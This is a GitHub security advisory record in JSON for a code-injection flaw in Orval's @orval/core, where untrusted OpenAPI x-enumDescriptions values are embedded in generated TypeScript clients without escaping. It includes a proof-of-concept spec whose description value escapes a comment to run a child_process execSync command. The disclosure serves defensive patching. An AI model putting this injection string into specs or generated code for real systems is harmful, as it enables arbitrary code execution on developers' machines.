{"id":"GHSA-h526-wf6g-67jv","summary":"Orval has a code injection via unsanitized x-enum-descriptions in enum generation","details":"### Impact\nArbitrary code execution in environments consuming generated clients\n\nThis issue is similar in nature to the recently-patched MCP vulnerability (CVE-2026-22785), but affects a different code path in @orval/core that was not addressed by that fix.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript code into generated clients via the x-enumDescriptions field, which is embedded without proper escaping in getEnumImplementation(). I have confirmed that the injection occurs during const enum generation and results in executable code within the generated schema files.\n\n### Patches\nUpgrade to Orval 8.0.2\n\n### References\nAn example OpenAPI showing the issue:\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Enum PoC\n  version: \"1.0.0\"\n\npaths:\n  /ping:\n    get:\n      operationId: ping\n      responses:\n        \"200\":\n          description: ok\n          content:\n            application/json:\n              schema:\n                $ref: \"#/components/schemas/EvilEnum\"\n\ncomponents:\n  schemas:\n    EvilEnum:\n      type: string\n      enum:\n        - PWNED\n      x-enumDescriptions:\n        - \"pwned */ require('child_process').execSync('id'); /*\"\n```","aliases":["CVE-2026-23947"],"modified":"2026-02-28T06:26:32.655069Z","published":"2026-01-21T01:01:13Z","related":["CVE-2026-25141"],"database_specific":{"cwe_ids":["CWE-77","CWE-94"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-01-21T01:01:13Z","nvd_published_at":"2026-01-20T01:15:57Z"},"references":[{"type":"WEB","url":"https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23947"},{"type":"WEB","url":"https://github.com/orval-labs/orval/commit/9e5d93533904936678ba93b5d20f6bca176a4e1e"},{"type":"PACKAGE","url":"https://github.com/orval-labs/orval"},{"type":"WEB","url":"https://github.com/orval-labs/orval/releases/tag/v7.19.0"},{"type":"WEB","url":"https://github.com/orval-labs/orval/releases/tag/v8.0.2"}],"affected":[{"package":{"name":"@orval/core","ecosystem":"npm","purl":"pkg:npm/%40orval/core"},"ranges":[{"type":"SEMVER","events":[{"introduced":"8.0.0-rc.0"},{"fixed":"8.0.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-h526-wf6g-67jv/GHSA-h526-wf6g-67jv.json"}},{"package":{"name":"@orval/core","ecosystem":"npm","purl":"pkg:npm/%40orval/core"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"7.19.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-h526-wf6g-67jv/GHSA-h526-wf6g-67jv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"}]}